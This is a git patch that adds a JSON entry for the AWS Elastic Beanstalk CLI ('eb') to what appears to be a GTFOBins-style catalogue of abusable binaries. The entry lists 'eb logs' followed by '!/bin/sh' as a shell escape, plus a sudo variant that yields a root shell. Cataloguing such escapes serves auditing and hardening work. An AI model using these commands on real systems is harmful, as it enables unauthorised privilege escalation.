From a46aa17fb061526487df539524204dc322694049 Mon Sep 17 00:00:00 2001 From: t0thkr1s Date: Wed, 4 Mar 2020 22:30:32 +0100 Subject: [PATCH] add data source for eb --- data/eb.json | 15 +++++++++++++++ 1 file changed, 15 insertions(+) create mode 100644 data/eb.json diff --git a/data/eb.json b/data/eb.json new file mode 100644 index 0000000..50bf90e --- /dev/null +++ b/data/eb.json @@ -0,0 +1,15 @@ +{ + "description": "This invokes the default logging service, which is likely to be 'journalctl', other functions may apply. For this to work the target must be connected to AWS instance via EB-CLI.", + "functions": { + "shell": [ + { + "code": "eb logs\n!/bin/sh\n" + } + ], + "sudo": [ + { + "code": "sudo eb logs\n!/bin/sh\n" + } + ] + } +} \ No newline at end of file